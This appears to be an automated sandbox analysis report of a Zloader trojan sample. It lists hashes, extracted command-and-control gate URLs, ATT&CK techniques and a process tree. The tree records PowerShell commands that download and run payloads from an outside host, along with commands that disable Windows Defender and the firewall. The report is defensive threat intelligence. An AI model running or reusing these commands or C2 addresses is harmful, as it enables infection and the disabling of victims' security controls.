zloader | 6c8e5f1670515c6a9d3cdcafe6d9a782a87f0f085095558cc0116ea73281c059

Analysis

max time kernel
32s
max time network
105s
platform
windows10_x64
resource
win10v20210410
submitted
06-08-2021 08:18

Sharing

Copy URL

Twitter E-mail

Reason

Remote task has failed: Machine shutdown

Report Analysis Logs

General

Target

aac2b6314988e0aea824fe0a53b917c1.exe
Size

165KB
MD5

aac2b6314988e0aea824fe0a53b917c1
SHA1

17c0d629b7a2f940e7a69f1120582cf89f70355a
SHA256

6c8e5f1670515c6a9d3cdcafe6d9a782a87f0f085095558cc0116ea73281c059
SHA512

0245fb86597e7106ef24a7348b9251fbf3936ff3643f372bea90b0c736c1275695012ce699d47c709597c1972c6a2af977507ba7378eefa5a73afeea48559715

Score

10^/10

zloader vasja vasja botnet evasion persistence trojan

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain

rsa_pubkey.plain

Signatures

Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
trojan botnet zloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

8 1052 powershell.exe
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

1096 regsvr32.exe

flow	pid	process
8	1052	powershell.exe

pid	process
1096	regsvr32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

aac2b6314988e0aea824fe0a53b917c1.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	aac2b6314988e0aea824fe0a53b917c1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	aac2b6314988e0aea824fe0a53b917c1.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

1052 powershell.exe
1052 powershell.exe
1052 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1052 powershell.exe

pid	process
1052	powershell.exe
1052	powershell.exe
1052	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1052	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

aac2b6314988e0aea824fe0a53b917c1.execmd.exeregsvr32.exe

description	pid	process	target process
PID 4064 wrote to memory of 540	4064	aac2b6314988e0aea824fe0a53b917c1.exe	cmd.exe
PID 4064 wrote to memory of 540	4064	aac2b6314988e0aea824fe0a53b917c1.exe	cmd.exe
PID 540 wrote to memory of 1052	540	cmd.exe	powershell.exe
PID 540 wrote to memory of 1052	540	cmd.exe	powershell.exe
PID 540 wrote to memory of 2472	540	cmd.exe	regsvr32.exe
PID 540 wrote to memory of 2472	540	cmd.exe	regsvr32.exe
PID 2472 wrote to memory of 1096	2472	regsvr32.exe	regsvr32.exe
PID 2472 wrote to memory of 1096	2472	regsvr32.exe	regsvr32.exe
PID 2472 wrote to memory of 1096	2472	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\aac2b6314988e0aea824fe0a53b917c1.exe
"C:\Users\Admin\AppData\Local\Temp\aac2b6314988e0aea824fe0a53b917c1.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4064

C:\Windows\SYSTEM32\cmd.exe
cmd /c start.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/JavaE.dll -OutFile JavaE.dll
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1052

C:\Windows\system32\regsvr32.exe
regsvr32 JavaE.dll
3⤵
- Suspicious use of WriteProcessMemory
PID:2472

C:\Windows\SysWOW64\regsvr32.exe
JavaE.dll
4⤵
- Loads dropped DLL
PID:1096

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
5⤵
PID:3860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/nsudo.bat -OutFile nsudo.bat
3⤵
PID:1568

C:\Windows\system32\cmd.exe
cmd /c nsudo.bat
3⤵
PID:3936

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
4⤵
PID:3836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/javase.exe -OutFile javase.exe
4⤵
PID:2616

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
4⤵
PID:1940

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T sc config WinDefend start= disabled
4⤵
PID:4076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"
4⤵
PID:1120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""
4⤵
PID:1568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""
4⤵
PID:3944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""
4⤵
PID:756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""
4⤵
PID:3728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""
4⤵
PID:2256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
4⤵
PID:1096

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
5⤵
PID:1048

C:\Windows\system32\shutdown.exe
shutdown.exe /r /t 00
4⤵
PID:1848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Restart-Computer
4⤵
PID:1568

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3acc055 /state1:0x41c64e6d
1⤵
PID:1540

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
fe4d4718253d0e2b1fa92d67a8a8b357

SHA1
e171cd8c3da83491f194f03b98aafbce50553003

SHA256
0a34875c2092f71d6202fe50c940ebdb7fdc4365b22eefe51c7cd92e7e7ddb61

SHA512
a5e7c2708b534f89e0ba7f4b6e635b5f05212d7314ea0231de5594bb1c1c2e5553e69f583dbeef95f73e728233629bdfd91c1ab81dd5b8bfd2852892cb1490b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
bf91d6bf0da13087e2023e5de8bd36bd

SHA1
d8686dd1303605d068a7e2c72869548a252cb2f9

SHA256
496965097dde4e1812503e99ac7c1687fd4d6d0faf84e0a6bbba67c76e8f652f

SHA512
1546cdbc8f7cfb3aee908a816d52ec94505bfef5e220ff929e9ad3fccaf4d1e2f340aa43978551b304e29c87fbcd2ca76ef02d37666820621011448415c17f99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
545853f7f584f1bfce3779d2d8777f1f

SHA1
aeea1b770c7e3863d32011d4dca65e3c7365d649

SHA256
79b731cddd142c8a199b2b23710565cc3bdaa9f37a72b056457883b55e6b1f1a

SHA512
2b2aa32ba7eb426e407bd9aedeb9e54e000ab49bc5a8c7af2195c4eec6d38bb3afee5dc672090ce127c6f38f0e4afe8ee431e659750767c189b24242fcc3e4da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a43c085af09f11784fe5e93fd92ae61b

SHA1
fd4cdf0492812d94998118ef83bec1708a2fe338

SHA256
ecc16bea32ec452ac25744d3f24fbd18df8ae539f55539147c622417ed380531

SHA512
ff029092910059e0d4264c0d7559e60be68981a6fbc6bb39b70b82f656263d856c764318fc2883ae1832ed863b37ff7d2f66451c224d2492fe054b1b723b1f73

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
77fed1cc5c5166740e0e04975f64b171

SHA1
67c47b610836200f6003fce22b648ce0696260bf

SHA256
ed7a1e4b04a2c1d9ef86ae6fb2c7642ef3489bd76c3a0bf8308afbf61161a769

SHA512
7132e5fae382c51bd0a78be2357bd8300107558e3e4426a8de96dcd7f05970d7bd42be0c542f20f58582ae6640b4086677053050a3f1ff4cdb5db2130cbe237d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
758c1105740a984a68847f065a73ea18

SHA1
cc18c333ff8ae6b0a41472eb283adb1f990ab8b6

SHA256
bd624bcb77bf9d17ba067576912a3d1202b308c82f89b01b97fec12895d45196

SHA512
fcbe70c28b690849fc364d4f9210b9996d01174121af4ac3b5febdfcfd8d95ce606f3b478e096c991764d3f88566476aeccee97cabf23afdd7540678d3d8d570

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8d36df633a79a2f67f3853a40aae9626

SHA1
934a85284ec3dcc2e7e509442380139a8ae1573c

SHA256
572d713c8c936e29b80238849c23a53bd48ac766e83cfd8f846c61646246bcef

SHA512
dd3d04fa5d181e6ab1c4bb1d2a977f3a6c4d3e1801bb59cee70748f1dc1a2bb2fa32c076b0c91651b2e7b419b81feff2f5c7faec30d5a861a518a6c259207ee3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
e123b333aacadc4092dbe0e7fa4250e9

SHA1
4e1e6ca6d5728a777f0d271b7ef267c23149d66f

SHA256
67696e3a235fd282c5d797b869e1fff27dd360ab93a2d6262e7369404f83c08b

SHA512
46fc575a67ac63d4d33e265798711cc40371975fd893ef1f522de26b6fd3e910fbd6edf268b16cb23920d8c2e47bb7bbf513ad403c514f938eaa8f8d0a5028c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a7a327da50d8697542b217ec1fe4a0f8

SHA1
fe201186beef208e97471f16dc2cf57b7d89ae00

SHA256
885c4101ea382dd88209bf33c43f4f11df6b3cb4a89029e4ba56adce79f206e3

SHA512
ba1ecf74701d7c9831f12cf48adf7449f67f1f076cb210d1cd288aa246e58efab7993de94c36bcf9af8987dd3d4fa693617d516b0dbb42735b3b83108b1ea588

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
MD5
eec559fabd6ec7024f586fb3a1754fac

SHA1
f7498a978c2ed501a3b5d8478cdbd60a72a2d60a

SHA256
30892cefd5d62af5c37c7b431c0c03cd90c8bcb795d4c7c0db97b087e2cdf4be

SHA512
8010da9eb8b00079411aff2bbca28e0d778c3a9fdd1fe299d0f42d61f435e161af54e14079ad3dbbfa9b0592817d453f1305b91879cd5e8f4a6968481e20ee17

Download Submit
C:\Users\Admin\AppData\Roaming\JavaE.dll
MD5
86cef6c066a05b3f67123fbf638b6b01

SHA1
81618f8ecc48541c219aa974e4b16cab8f34203b

SHA256
86c37d778f584a2a3090ab170c8cd2fb3ddf952cde689b4c5a1efd74fc113a05

SHA512
1132f94eeb8ae5d4556841976789b648f2394a4089db2e6b43c2047cc87004f00e334e14a96c5ab0535aeb13f3bffc8d5e955d7435b9be2aba491bcbe92044d9

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\nsudo.bat
MD5
06005e9cf3aec2b86a3be78623683b46

SHA1
f7e3d83dd9466eeb8b7e4cf3322a08e757a6b63a

SHA256
1f9e24e527f702f5f4a7f65a776df38b2d4240d8e3f13713045cab3466746272

SHA512
bb99a6ad1da80692a12f9079bf3be80bd656fa4eb4aef59b1a64affebc5b8a95525c0ebed1bd186cf30493cbba85fc49d1093472bdc3027608daa05fde302323

Download Submit
\Users\Admin\AppData\Roaming\JavaE.dll
MD5
86cef6c066a05b3f67123fbf638b6b01

SHA1
81618f8ecc48541c219aa974e4b16cab8f34203b

SHA256
86c37d778f584a2a3090ab170c8cd2fb3ddf952cde689b4c5a1efd74fc113a05

SHA512
1132f94eeb8ae5d4556841976789b648f2394a4089db2e6b43c2047cc87004f00e334e14a96c5ab0535aeb13f3bffc8d5e955d7435b9be2aba491bcbe92044d9

Download Submit
memory/540-114-0x0000000000000000-mapping.dmp

Download
memory/756-350-0x000001A59A5D3000-0x000001A59A5D5000-memory.dmp

Filesize
8KB

Download
memory/756-315-0x0000000000000000-mapping.dmp

Download
memory/756-349-0x000001A59A5D0000-0x000001A59A5D2000-memory.dmp

Filesize
8KB

Download
memory/756-351-0x000001A59A5D6000-0x000001A59A5D8000-memory.dmp

Filesize
8KB

Download
memory/756-382-0x000001A59A5D8000-0x000001A59A5D9000-memory.dmp

Filesize
4KB

Download
memory/1048-441-0x0000000000000000-mapping.dmp

Download
memory/1052-131-0x0000023A72783000-0x0000023A72785000-memory.dmp

Filesize
8KB

Download
memory/1052-116-0x0000000000000000-mapping.dmp

Download
memory/1052-121-0x0000023A726F0000-0x0000023A726F1000-memory.dmp

Filesize
4KB

Download
memory/1052-125-0x0000023A72B40000-0x0000023A72B41000-memory.dmp

Filesize
4KB

Download
memory/1052-130-0x0000023A72780000-0x0000023A72782000-memory.dmp

Filesize
8KB

Download
memory/1052-132-0x0000023A72786000-0x0000023A72788000-memory.dmp

Filesize
8KB

Download
memory/1096-430-0x0000000000000000-mapping.dmp

Download
memory/1096-442-0x0000024B844C0000-0x0000024B844C2000-memory.dmp

Filesize
8KB

Download
memory/1096-447-0x0000024B844C6000-0x0000024B844C8000-memory.dmp

Filesize
8KB

Download
memory/1096-139-0x0000000000000000-mapping.dmp

Download
memory/1096-443-0x0000024B844C3000-0x0000024B844C5000-memory.dmp

Filesize
8KB

Download
memory/1096-141-0x0000000004580000-0x0000000004581000-memory.dmp

Filesize
4KB

Download
memory/1096-142-0x0000000010000000-0x0000000010148000-memory.dmp

Filesize
1.3MB

Download
memory/1120-231-0x00000256D3EE6000-0x00000256D3EE8000-memory.dmp

Filesize
8KB

Download
memory/1120-197-0x0000000000000000-mapping.dmp

Download
memory/1120-206-0x00000256D3EE0000-0x00000256D3EE2000-memory.dmp

Filesize
8KB

Download
memory/1120-208-0x00000256D3EE3000-0x00000256D3EE5000-memory.dmp

Filesize
8KB

Download
memory/1568-274-0x000001A56E796000-0x000001A56E798000-memory.dmp

Filesize
8KB

Download
memory/1568-272-0x000001A56E793000-0x000001A56E795000-memory.dmp

Filesize
8KB

Download
memory/1568-271-0x000001A56E790000-0x000001A56E792000-memory.dmp

Filesize
8KB

Download
memory/1568-239-0x0000000000000000-mapping.dmp

Download
memory/1568-164-0x000001FE793C6000-0x000001FE793C8000-memory.dmp

Filesize
8KB

Download
memory/1568-446-0x0000000000000000-mapping.dmp

Download
memory/1568-289-0x000001A56E798000-0x000001A56E799000-memory.dmp

Filesize
4KB

Download
memory/1568-146-0x0000000000000000-mapping.dmp

Download
memory/1568-162-0x000001FE793C0000-0x000001FE793C2000-memory.dmp

Filesize
8KB

Download
memory/1568-163-0x000001FE793C3000-0x000001FE793C5000-memory.dmp

Filesize
8KB

Download
memory/1848-445-0x0000000000000000-mapping.dmp

Download
memory/1940-193-0x0000000000000000-mapping.dmp

Download
memory/2256-433-0x000002061CB08000-0x000002061CB09000-memory.dmp

Filesize
4KB

Download
memory/2256-392-0x0000000000000000-mapping.dmp

Download
memory/2256-427-0x000002061CB06000-0x000002061CB08000-memory.dmp

Filesize
8KB

Download
memory/2256-425-0x000002061CB00000-0x000002061CB02000-memory.dmp

Filesize
8KB

Download
memory/2256-426-0x000002061CB03000-0x000002061CB05000-memory.dmp

Filesize
8KB

Download
memory/2472-137-0x0000000000000000-mapping.dmp

Download
memory/2616-186-0x0000016AF2760000-0x0000016AF2762000-memory.dmp

Filesize
8KB

Download
memory/2616-172-0x0000000000000000-mapping.dmp

Download
memory/2616-187-0x0000016AF2763000-0x0000016AF2765000-memory.dmp

Filesize
8KB

Download
memory/2616-191-0x0000016AF2766000-0x0000016AF2768000-memory.dmp

Filesize
8KB

Download
memory/3728-354-0x0000000000000000-mapping.dmp

Download
memory/3728-395-0x0000025CC1E48000-0x0000025CC1E49000-memory.dmp

Filesize
4KB

Download
memory/3728-385-0x0000025CC1E46000-0x0000025CC1E48000-memory.dmp

Filesize
8KB

Download
memory/3728-384-0x0000025CC1E43000-0x0000025CC1E45000-memory.dmp

Filesize
8KB

Download
memory/3728-383-0x0000025CC1E40000-0x0000025CC1E42000-memory.dmp

Filesize
8KB

Download
memory/3836-171-0x0000000000000000-mapping.dmp

Download
memory/3860-161-0x0000000003010000-0x0000000003036000-memory.dmp

Filesize
152KB

Download
memory/3860-143-0x0000000000000000-mapping.dmp

Download
memory/3936-169-0x0000000000000000-mapping.dmp

Download
memory/3944-319-0x000002B39E528000-0x000002B39E529000-memory.dmp

Filesize
4KB

Download
memory/3944-316-0x000002B39E526000-0x000002B39E528000-memory.dmp

Filesize
8KB

Download
memory/3944-291-0x000002B39E523000-0x000002B39E525000-memory.dmp

Filesize
8KB

Download
memory/3944-290-0x000002B39E520000-0x000002B39E522000-memory.dmp

Filesize
8KB

Download
memory/3944-277-0x0000000000000000-mapping.dmp

Download
memory/4076-195-0x0000000000000000-mapping.dmp

Download